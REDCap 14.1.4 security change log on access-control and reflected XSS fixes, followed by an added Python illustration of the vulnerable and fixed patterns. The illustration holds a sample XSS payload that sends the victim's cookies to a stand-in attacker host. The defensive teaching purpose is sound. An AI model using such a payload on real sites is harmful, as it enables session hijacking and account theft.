REDCap Change Log Version 14.1.4 (released on )

Medium security fix: A Broken Access Control vulnerability was discovered in which a logged-in user who is not a REDCap administrator could create Custom Application Links and have them appear on the left-hand menu of any and all projects in the system. This could be used to trick users into navigating to potentially malicious websites. Only admins should be able to create, modify, and delete Custom Application Links in the Control Center. The bug exists in all REDCap versions from the past 10 years. The user must be authenticated into REDCap in order to exploit this.

Major security fix: A Reflected XSS (Cross-site Scripting) vulnerability was discovered on the confirmation page displayed to users who have submitted specific requests to the REDCap administrator (e.g., a request to move a project to production). A malicious user could potentially exploit it by inserting custom JavaScript, crafted in a specific way, into the URL.

Major security fix: A Reflected XSS (Cross-site Scripting) vulnerability was discovered on the Alerts & Notifications page. A malicious user could potentially exploit it by inserting custom JavaScript, crafted in a specific way, into parameters of certain AJAX requests. The user must be an admin and must be authenticated into REDCap in order to exploit this.

Major security fix: A Reflected XSS (Cross-site Scripting) vulnerability was discovered in the Database Query Tool. A malicious user could potentially exploit it by inserting custom JavaScript, crafted in a specific way, into saved queries on the page.

Major security fix: A Reflected XSS (Cross-site Scripting) vulnerability was discovered on the "Importing instrument from the REDCap Shared Library" page. A malicious user could potentially exploit it by inserting custom JavaScript, crafted in a specific way, into input elements on the page.
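The two bug classes above, reflected XSS through an unencoded URL parameter and a privileged action authorized on client-supplied data rather than the server-side session, can be reproduced and fixed in a few lines. The following is an added illustration and not REDCap's own code: the handler names, the `Session` and `ControlCenter` stand-ins, and the payload string are all constructed for this example. It shows the vulnerable reflection next to the output-encoded version, and an admin-only create operation that rejects a non-administrator even when the request body claims admin rights.

```python
"""Hypothetical, minimal model of the two bug classes in the 14.1.4 notes.

Not REDCap code: the function names, the session object and the payload
below are constructed for this illustration only.
"""
import html
from dataclasses import dataclass, field

# Constructed sample payload of the kind a reflected-XSS report describes:
# attacker-controlled text arriving via a URL query parameter. The leading
# `">` is there to break out of an attribute value as well as a text node.
XSS_PAYLOAD = (
    '"><script>document.location="https://attacker.example/?c="'
    "+document.cookie</script>"
)


def render_confirmation(message: str, escape_output: bool = True) -> str:
    """Build the confirmation page shown after a user request.

    With escape_output=False the parameter is reflected verbatim into both a
    text node and an attribute value (the vulnerable pattern). With
    escape_output=True every reflected occurrence is HTML-encoded, including
    quotes, so the browser renders it as text and never as markup.
    """
    shown = html.escape(message, quote=True) if escape_output else message
    return (
        "<html><body>"
        "<h2>Request received</h2>"
        f'<p id="msg" data-original="{shown}">{shown}</p>'
        "</body></html>"
    )


def contains_live_script(page: str) -> bool:
    """Crude check: does the page contain an unencoded <script tag?"""
    return "<script" in page.lower()


@dataclass
class Session:
    """Server-side session; is_admin is set at login, never from request data."""
    user: str
    is_admin: bool


@dataclass
class ControlCenter:
    """Stand-in for the admin-only store of Custom Application Links."""
    links: list = field(default_factory=list)

    def create_custom_app_link(self, session: Session, request_body: dict) -> None:
        # Access-control fix: authorize on the server-side session and ignore
        # any privilege claim (e.g. request_body["is_admin"]) sent by the client.
        if not session.is_admin:
            raise PermissionError(f"{session.user} is not a REDCap administrator")
        self.links.append({"label": request_body["label"], "url": request_body["url"]})


if __name__ == "__main__":
    print(render_confirmation(XSS_PAYLOAD, escape_output=False))  # script lands in the page
    print(render_confirmation(XSS_PAYLOAD))                       # rendered as inert text
```

Note that `html.escape(..., quote=True)` is only the right encoder for HTML text and double-quoted attribute contexts; a value reflected inside a `<script>` block or a URL needs JavaScript-string or URL encoding instead, which is why the hardened handler keeps the parameter out of those contexts entirely.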